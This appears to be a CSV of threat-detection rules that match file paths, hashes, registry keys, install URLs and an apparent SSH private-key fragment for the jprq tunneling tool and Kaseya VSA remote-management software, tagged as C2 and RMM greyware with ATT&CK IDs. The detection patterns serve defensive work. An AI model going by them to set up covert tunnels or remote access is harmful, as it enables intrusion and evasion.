"*/var/log/jprq/*",".{0,1000}\/var\/log\/jprq\/.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*\jprq-windows-386.exe*",".{0,1000}\\jprq\-windows\-386\.exe.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*\jprq-windows-amd64.exe*",".{0,1000}\\jprq\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*>jprq - join public router*",".{0,1000}\>jprq\s\-\sjoin\spublic\srouter.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*01713b6ae56ab0f1faf7834f29c22fb36c41bef9c6cf2b702dc3f617513c3be6*",".{0,1000}01713b6ae56ab0f1faf7834f29c22fb36c41bef9c6cf2b702dc3f617513c3be6.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*0cfa716d39fc90ed0c4db1bd68f1b4b791f26e5fab4003ae9b816d1f7d68d208*",".{0,1000}0cfa716d39fc90ed0c4db1bd68f1b4b791f26e5fab4003ae9b816d1f7d68d208.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*0d05bed47cc1579a068f83123a502c59d447b20a5318c1d70ffb7a0b638a7aff*",".{0,1000}0d05bed47cc1579a068f83123a502c59d447b20a5318c1d70ffb7a0b638a7aff.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*1a1b2883ad2c55fe3a1d4544bc1401e92a0b98148d85f6e5fdaa54154ba5a2e8*",".{0,1000}1a1b2883ad2c55fe3a1d4544bc1401e92a0b98148d85f6e5fdaa54154ba5a2e8.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*1b41fb4be93b92548f9e5419fae45b76592a5b6ab0c5d42930f6824686225f3c*",".{0,1000}1b41fb4be93b92548f9e5419fae45b76592a5b6ab0c5d42930f6824686225f3c.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*1e68cb8928288f31a3f1b7fc867f79f56912c289f93a3dffd962fea895fb8f12*",".{0,1000}1e68cb8928288f31a3f1b7fc867f79f56912c289f93a3dffd962fea895fb8f12.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*2ed85cb524b3d21a29ae39ad50874d1cf8546d2dfedb931b9fcf76cc4e0e7cf0*",".{0,1000}2ed85cb524b3d21a29ae39ad50874d1cf8546d2dfedb931b9fcf76cc4e0e7cf0.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*31fb5154969f2729699b04a7ea6202ad59dabb1e36eb5f8f9b1159e3775e267f*",".{0,1000}31fb5154969f2729699b04a7ea6202ad59dabb1e36eb5f8f9b1159e3775e267f.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*3984e827963ca5f0925404d02526b0c12956f4d04a64853226e54a2f9333bf04*",".{0,1000}3984e827963ca5f0925404d02526b0c12956f4d04a64853226e54a2f9333bf04.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*3eaa14907c96c3a261cce8f5379fa8ecab9911cc2f3711b4b08b8d382a7ee772*",".{0,1000}3eaa14907c96c3a261cce8f5379fa8ecab9911cc2f3711b4b08b8d382a7ee772.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*4796c4183abeeb96966e3eb03493345cd7e148688e9fe5613c5bda26692063b7*",".{0,1000}4796c4183abeeb96966e3eb03493345cd7e148688e9fe5613c5bda26692063b7.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*51e63f127dfc4804bec4dc1e5bc19034d50953c246417203b95ddba89bbfe082*",".{0,1000}51e63f127dfc4804bec4dc1e5bc19034d50953c246417203b95ddba89bbfe082.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*5a19b174e1c46c7f3591c79dc5264d43bb68c9537393a8cecd6269567b821778",".{0,1000}5a19b174e1c46c7f3591c79dc5264d43bb68c9537393a8cecd6269567b821778","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*6c3dc714596f1b78c4921bb8b25f073bdc95a8bca363f070b4e5e34c4b2a34ac*",".{0,1000}6c3dc714596f1b78c4921bb8b25f073bdc95a8bca363f070b4e5e34c4b2a34ac.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*73314bd200038dc11b2a008f9d90164565d15744724a5ea9a0750823a8d0d73b*",".{0,1000}73314bd200038dc11b2a008f9d90164565d15744724a5ea9a0750823a8d0d73b.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*7d367e348e24f197222c639324ce56bea8d2b2cd39c88f8df390e1b5af90942b*",".{0,1000}7d367e348e24f197222c639324ce56bea8d2b2cd39c88f8df390e1b5af90942b.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*8e63f8fb62f2dd2f310bf619ab65c97d5dd1835d97cced5eb8cebddd293d2d06*",".{0,1000}8e63f8fb62f2dd2f310bf619ab65c97d5dd1835d97cced5eb8cebddd293d2d06.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*905bda9ca65d9b7f6151de763a7c3ce2dd15a69b8410d89b04dd5bb68d17dece*",".{0,1000}905bda9ca65d9b7f6151de763a7c3ce2dd15a69b8410d89b04dd5bb68d17dece.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*9e3476f783250e1fd848c17fb9d5a6c32e151ff1382bcde09a0ac903dea8a16f*",".{0,1000}9e3476f783250e1fd848c17fb9d5a6c32e151ff1382bcde09a0ac903dea8a16f.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*a56d443310f333dae0b4900ca18d0f903f5076369ae4053c035d9c39d76f59b2*",".{0,1000}a56d443310f333dae0b4900ca18d0f903f5076369ae4053c035d9c39d76f59b2.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*acd19845a6484eee65db6f925b1d0244300831d4d5a37d147cc61e7e8c56775b*",".{0,1000}acd19845a6484eee65db6f925b1d0244300831d4d5a37d147cc61e7e8c56775b.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*azimjohn/jprq*",".{0,1000}azimjohn\/jprq.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*b44c1910df6b24847b75712e9f183d5fd9119e2e4dfdc15eeecb5e7159e4530a*",".{0,1000}b44c1910df6b24847b75712e9f183d5fd9119e2e4dfdc15eeecb5e7159e4530a.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*bdca5844eac154b94bbdd1b51e68f7d4e45a560fa13c7ce0a227646b0091982a*",".{0,1000}bdca5844eac154b94bbdd1b51e68f7d4e45a560fa13c7ce0a227646b0091982a.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*bf356e9c87e06eddfe9c5c476742bbc9cf26405631296f03c8f57f91afbb5247*",".{0,1000}bf356e9c87e06eddfe9c5c476742bbc9cf26405631296f03c8f57f91afbb5247.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*de10b700cffb64956f55e044a9ce830d9b775af10560b54f21b2fc125c801618*",".{0,1000}de10b700cffb64956f55e044a9ce830d9b775af10560b54f21b2fc125c801618.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*e749b296484dbb4329fc0e4dff5fe963ddc7ff3450042ce267fdd1b5abcd2fdb*",".{0,1000}e749b296484dbb4329fc0e4dff5fe963ddc7ff3450042ce267fdd1b5abcd2fdb.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*f11f0d5b7f14d4751f40b9c2c92928dfdbe0d055981e140ba0a5d75ecfe72e10*",".{0,1000}f11f0d5b7f14d4751f40b9c2c92928dfdbe0d055981e140ba0a5d75ecfe72e10.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*fc621d5952a8fb61bfc73e197db64d87f35d1c12550b7bf6160bc78f6d61e44f*",".{0,1000}fc621d5952a8fb61bfc73e197db64d87f35d1c12550b7bf6160bc78f6d61e44f.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","#filehash","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*github.com*/jprq/releases/download/*",".{0,1000}github\.com.{0,1000}\/jprq\/releases\/download\/.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*https://aur.archlinux.org/jprq.git*",".{0,1000}https\:\/\/aur\.archlinux\.org\/jprq\.git.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*https://jprq.io/auth*",".{0,1000}https\:\/\/jprq\.io\/auth.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*https://jprq.io/install.sh*",".{0,1000}https\:\/\/jprq\.io\/install\.sh.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*JPRQ - The Tunneling Service*",".{0,1000}JPRQ\s\-\sThe\sTunneling\sService.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*jprq is successfully installed*",".{0,1000}jprq\sis\ssuccessfully\sinstalled.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*JPRQ_DOMAIN=*",".{0,1000}JPRQ_DOMAIN\=.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*MIIEpQIBAAKCAQEAuIGT1C2uPwb62IT/5IJdFioVAB/r3Pa885n4z+xEtGIm6XmD*",".{0,1000}MIIEpQIBAAKCAQEAuIGT1C2uPwb62IT\/5IJdFioVAB\/r3Pa885n4z\+xEtGIm6XmD.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","ssh privkey","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"* pcmontask.exe*",".{0,1000}\spcmontask\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* RemoteDesktop.exe*",".{0,1000}\sRemoteDesktop\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* VSAX_x64.msi*",".{0,1000}\sVSAX_x64\.msi.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.vsax.net*",".{0,1000}\.vsax\.net.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/pcmontask.exe*",".{0,1000}\/pcmontask\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/RemoteDesktop.exe*",".{0,1000}\/RemoteDesktop\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/VSAX_x64.msi*",".{0,1000}\/VSAX_x64\.msi.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/vsxrc-clip.exe*",".{0,1000}\/vsxrc\-clip\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\freerdp*",".{0,1000}\\AppData\\Roaming\\freerdp.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\VSA X*",".{0,1000}\\AppData\\Roaming\\VSA\sX.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Services\VSAX*",".{0,1000}\\CurrentControlSet\\Services\\VSAX.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\Kaseya\PC Monitor\*",".{0,1000}\\Kaseya\\PC\sMonitor\\.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\PC Monitor\Addons*",".{0,1000}\\PC\sMonitor\\Addons.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\pcmontask.exe*",".{0,1000}\\pcmontask\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\pcmupdate.exe*",".{0,1000}\\pcmupdate\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemoteDesktop.exe*",".{0,1000}\\RemoteDesktop\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Services\EventLog\Application\VSA X*",".{0,1000}\\Services\\EventLog\\Application\\VSA\sX.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\Services\EventLog\Application\VSAX*",".{0,1000}\\Services\\EventLog\\Application\\VSAX.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\Kaseya\*",".{0,1000}\\SOFTWARE\\Kaseya\\.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\TaskCache\Tree\VSA XServiceCheck*",".{0,1000}\\TaskCache\\Tree\\VSA\sXServiceCheck.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\VSA X Manager.lnk*",".{0,1000}\\VSA\sX\sManager\.lnk.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\VSA X Remote Control.lnk*",".{0,1000}\\VSA\sX\sRemote\sControl\.lnk.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\VSA X Remote Control\*",".{0,1000}\\VSA\sX\sRemote\sControl\\.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\VSA X\watchdog.bat*",".{0,1000}\\VSA\sX\\watchdog\.bat.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\VSA XServiceCheck*",".{0,1000}\\VSA\sXServiceCheck.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
